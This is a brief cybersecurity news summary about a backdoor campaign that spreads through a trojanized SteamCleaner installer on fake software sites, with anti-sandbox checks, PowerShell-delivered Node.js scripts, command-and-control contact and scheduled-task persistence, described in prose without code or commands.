A sophisticated backdoor malware campaign is exploiting a weaponized version of SteamCleaner to compromise Windows systems. This legitimate utility, designed to clean junk files from the Steam gaming platform, has been altered to include malicious code. Attackers are distributing the malware through fraudulent websites disguised as software repositories. Users seeking cracked software are unknowingly downloading the malicious installer, signed with a valid digital certificate, which facilitates its execution without raising initial alarms.
Once executed, the malware installs itself in the designated directory and implements advanced environmental checks to detect sandbox environments. It maintains functionality while utilizing anti-sandbox detection mechanisms, executing only safe operations in such cases. The malicious payload delivery employs encrypted PowerShell commands, ensuring the installation of Node.js and the subsequent download of additional malicious scripts. These scripts establish communication with command-and-control servers, enabling remote command execution and ensuring persistence via Windows Task Scheduler.
👉 Pročitaj original: Cyber Security News
